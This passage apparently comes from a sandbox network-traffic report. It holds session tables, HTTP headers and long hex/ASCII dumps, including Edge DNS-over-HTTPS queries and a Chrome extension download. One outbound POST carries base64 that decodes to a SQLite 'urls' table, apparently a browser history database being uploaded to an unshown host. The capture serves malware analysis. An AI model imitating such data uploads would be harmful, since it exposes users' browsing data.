                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                          Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:56 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          20192.168.2.749785172.64.41.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          21192.168.2.749787162.159.61.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          22192.168.2.749774172.217.17.654431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Length: 154477
                                                                                                                                                                                                                                                                                          X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn
                                                                                                                                                                                                                                                                                          X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                          Expires: Thu, 18 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Age: 54941
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                          ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                          Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                          Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                          Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                          Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                          Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                          Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                          Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                          Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                          Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                          Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          23192.168.2.749786162.159.61.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
